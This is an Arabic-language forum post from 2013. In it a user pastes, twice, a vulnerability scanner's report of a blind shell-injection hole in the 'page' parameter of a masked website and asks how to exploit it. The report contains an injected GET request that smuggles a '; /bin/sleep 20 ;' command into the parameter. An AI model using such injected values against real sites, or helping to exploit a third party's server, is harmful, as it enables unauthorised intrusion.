etos
06-14-2013, 04:59 PM
يا اخوانى هذه ثانى مره احط فيها الموضوع دا ومحدش عبرنى
ثغره Shell Injection
Classification: Information
Resource: /video-2006
Parameter: page
Method: GET
Detection Type: Blind Timing Analysis Checks
Risk: High
------------------------------------------------------------------------------------------
Request
GET /video-2006?tmpl=component&print=1&layout=default&page='% 20%3B%20/bin/sleep%2020%20%3B%20
--------------------------------------------------------------------------------------
Resource Content
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ar-aa" lang="ar-aa">
<head>
<script type="text/javascript">
var siteurl='/';
var tmplurl='/templates/mans_ar/';
var isRTL = true;
</script>
<base href="http://www.**********.com/video-2006" />
****** http-equi...
ممكن حد يعرفنى كيف استغلها واكن شاكرا له
ثغره Shell Injection
Classification: Information
Resource: /video-2006
Parameter: page
Method: GET
Detection Type: Blind Timing Analysis Checks
Risk: High
------------------------------------------------------------------------------------------
Request
GET /video-2006?tmpl=component&print=1&layout=default&page='% 20%3B%20/bin/sleep%2020%20%3B%20
--------------------------------------------------------------------------------------
Resource Content
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ar-aa" lang="ar-aa">
<head>
<script type="text/javascript">
var siteurl='/';
var tmplurl='/templates/mans_ar/';
var isRTL = true;
</script>
<base href="http://www.**********.com/video-2006" />
****** http-equi...
ممكن حد يعرفنى كيف استغلها واكن شاكرا له